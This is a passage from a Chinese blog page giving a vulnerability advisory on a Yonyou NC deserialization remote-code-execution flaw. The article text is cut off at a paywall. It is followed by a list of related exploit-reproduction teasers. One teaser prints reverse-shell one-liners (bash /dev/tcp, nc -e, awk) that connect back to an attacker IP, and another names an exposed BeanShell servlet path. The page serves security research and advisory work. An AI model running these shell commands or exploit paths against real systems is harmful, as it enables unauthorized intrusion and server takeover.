nc日志打印_漏洞预警 | 用友NC反序列化远程命令执行漏洞

最新推荐文章于 2024-07-13 13:01:12 发布
最新推荐文章于 2024-07-13 13:01:12 发布
阅读量2.5k 收藏
点赞数
文章标签: nc日志打印
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39605894/article/details/111633064
版权

0x00  漏洞编号

  • 暂无

0x01 危险等级

  • 高危

0x02 简介

用友NC是为企业提供建模、开发、继承、运行、管理一体化的IT解决方案的信息化平台。用友NC为C/S架构,使用JAVA编程语言开发,客户端可直接使用UClient,服务端接口为HTTP。

729c18c96ead6c249f598466943311e7.png


0x03 漏洞概述

根据万物皆可调定理,综合使用java agent和 jdwp的方式进行调试,java agent是为了准确定位打断点的位置。Java agent的Transformer代码如下,目的是将实时调用的类打印出来,方便打断点,jdwp调试不多说:

package org.javaweb;import org.apache.log4j.Logger;import java.lang.instrument.ClassFileTransformer;import java.lang.instrument.IllegalClassFormatException;import java.security.Prot
最低0.47元/天 解锁文章
weixin_39605894
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
用友NCNC Cloud MxServlet反序列化漏洞复现
0xSec
11-15 2190
用友NCNC Cloud系统存在反序列化漏洞,系统未将用户传入的序列化数据进行过滤就直接执行反序列化操作,结合系统本身存在的反序列化利用链,可造成了命令执行,深入利用可随意操作服务器。
用友 NCNC Cloud 多处反序列化RCE漏洞复现
0xSec
12-17 1568
用友 NCNC Cloud存在多处反序列化代码执行漏洞,攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
EtMi832#PeiQi-WIKI-POC#用友 NC XbrlPersistenceServlet反序列化2
07-25
用友 NC XbrlPersistenceServlet反序列化漏洞描述用友 NC XbrlPersistenceServlet反序列化漏洞漏洞影响用友NC漏洞
【HW必备】用友NC-Cloud存在17处漏洞合集
wananxuexihu的博客
06-24 876
漏洞挖掘是指通过分析软件、系统或网络中存在的安全漏洞来发现并利用这些漏洞漏洞挖掘是信息安全领域的一项重要工作,可以帮助企业和组织提高系统的安全性,避免黑客攻击和数据泄露。漏洞挖掘的流程一般可以概括为以下几个步骤:确定目标:确定要挖掘的软件或系统。这可能是一个应用程序、操作系统、网络设备或其他系统。收集信息:收集有关目标的信息,包括架构、协议、版本和配置等。这些信息可以通过互联网搜索、手动扫描、自动化工具和其他途径获得。分析漏洞:通过手动和自动化技术进行漏洞分析,识别潜在的漏洞类型和攻击面。
用友NC 漏洞汇总(转载)
xiaobai_20190815的博客
11-21 9020
用友NC 漏洞汇总
用友 NC actionhandlerservlet 反序列化漏洞复现
qq_39573664的博客
01-03 2473
用友 NC actionhandlerservlet处存在反序列化漏洞,攻击者通过漏洞可以获取网站权限,导致服务器失陷。
用友NC BeanShell远程代码执行
09-07
用友 NC bsh.[servlet](https://so.csdn.net/so/search?q=servlet&spm=1001.2101.3001.7020).BshServlet 存在远程命令执行漏洞,通过BeanShell 执行远程命令获取服务器权限。 ## 漏洞影响 ``` NC 6.5版本 具体详见...
用友NC任意文件上传漏洞利用工具
04-14
用友NC任意文件上传漏洞利用工具,用友NC...漏洞成因在于上传文件处未作类型限制,未经身份验证的攻击者可通过向目标系统发送特制数据包来利用此漏洞,成功利用此漏洞远程攻击者可在目标系统上传任意文件执行命令
NC-57BSH远程代码执行漏洞补丁
01-25
先按 说明.txt 中的方案解决 如果替换jar包后导致错误,可以用如下这个方案,直接在原jar包上修改: 把项目上“bsh-2.0b”原文件中的 \bsh\servlet\...影响版本:NC57 / NC63 / NC65 / NCC1903 / NCC1909 / NCC2005
nc57-任意文件读取漏洞补丁
06-08
【标题】"nc57-任意文件读取漏洞补丁" 涉及的是一个针对NC57软件的安全问题,该补丁旨在修复一个可能导致任意文件读取的漏洞。在网络安全领域,这样的漏洞通常是非常严重的问题,因为它允许攻击者未经授权访问系统上...
Goby漏洞更新 | 用友NC com.ufsoft.iufo.jiuqi.JiuQiClientReqDispatch 反序列化命令执行漏洞
m0_46699477的博客
04-06 1041
用友NC是为集团与行业企业提供的全线管理软件产品。用友NC JiuQiClientReqDispatch路由,其中存在反序列化导致命令执行
漏洞复现】用友NC-Cloud-反序列化-ConfigResourceServlet
知黑而守白
04-11 185
NC Cloud是用友公司推出的大型企业数字化平台。支持公有云、混合云、专属云的灵活部署模式。NC Cloud完全基于云原生架构,技术先进、性能稳定、自主安全可控,支撑大中型以及超大型集团企业N层多site混合云部署方案,支持整个系统高可用、弹性扩展、双/多活,以及快速灾备恢复能力等。用友-NC-Cloud ConfigResourceServlet 接口存在反序列化漏洞,使得攻击者可以通过构造特定的请求远程执行恶意代码。此漏洞可能导致攻击者获取系统权限、执行任意命令,严重威胁系统的机密性和完整性。
漏洞复现】用友NC-Cloud ConfigResourceServlet 反序列化漏洞
qq_67810151的博客
04-16 529
用友NC 存在反序列化漏洞,未授权的攻击者可以通过该漏洞执行任意命令,从而控制服务器。
漏洞复现】用友NC-Cloud-反序列化-ResourceManagerServlet
知黑而守白
04-11 720
NC Cloud是用友公司推出的大型企业数字化平台。支持公有云、混合云、专属云的灵活部署模式。NC Cloud完全基于云原生架构,技术先进、性能稳定、自主安全可控,支撑大中型以及超大型集团企业N层多site混合云部署方案,支持整个系统高可用、弹性扩展、双/多活,以及快速灾备恢复能力等。用友-NC-Cloud ResourceManagerServlet 接口存在反序列化漏洞,使得攻击者可以通过构造特定的请求远程执行恶意代码。此漏洞可能导致攻击者获取系统权限、执行任意命令,严重威胁系统的机密性和完整性。
用友NC任意文件上传漏洞复现
Adminxe的博客
12-14 1万+
0x00 事件描述 用友NC是一款企业级管理软件,在大中型企业广泛使用。实现建模、开发、继承、运行、管理一体化的IT解决方案信息化平台。用友NC 为C/S 架构,使用JAVA编程语言开发,客户端可直接使用UClient,服务端接口为HTTP。 用友NC6.5的某个页面,存在任意文件上传漏洞漏洞成因在于上传文件处未作类型限制,未经身份验证的攻击者可通过向目标系统发送特制数据包来利用此漏洞,成功利用此漏洞远程攻击者可在目标系统上传任意文件执行命令。 0x01 漏洞原理 根据文档,FileRece..
反弹shell的各种姿势
baidu_38844729的博客
11-12 556
前言:攻击机器IP10.10.10.69,监听端口888,反弹命令均在目标机器上执行 nc -lvp 888 1、bash反弹 bash -i >& /dev/tcp/10.10.10.69/888 0>&1 base64编码绕过:http://www.jackson-t.ca/runtime-exec-payloads.html 2、nc反弹 nc -e /bin/bash 10.10.10.69 888 3、awk反弹 awk 'BEGIN{s="/inet/tcp/0
漏洞分析 | U8 Cloud ServiceDispatcher反序列化漏洞及补丁分析
m0_46699477的博客
11-04 1817
本文对 U8Cloud ServiceDispatcher 接口反序列化漏洞原理进行跟踪分析,讲述了该漏洞是如何被利用以及官方的修复方式。
用友NC Cloud blobRefClassSearch FastJson反序列化RCE漏洞复现
最新发布
0xSec
07-13 678
用友 NC Cloud blobRefClassSearch 接口处存在FastJson反序列化漏洞,未经身份验证的远程攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
远程代码执行反序列化漏洞
weixin_59616219的博客
12-21 861
远程代码执行反序列化漏洞
用友NC的一些漏洞复现
热门推荐
yzl_007的博客
12-15 1万+
用友NC的一些漏洞复现 一、BeanShell Test Servlet命令执行 漏洞介绍:用友NC是面向集团企业的管理软件,其在同类市场占有率中达到亚太第一。该漏洞是由于用友NC对外开放了BeanShell接口,攻击者可以在未授权的情况下直接访问该接口,并构造恶意数据执行任意代码并获取服务器权限。 影响范围:NC 6.5版本 复现过程: 访问对应网站后界面如下: 漏洞url就是:ip地址:端口/servlet/~ic/bsh.servlet.BshServlet 后续还可以写shell进去,但是这里不
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值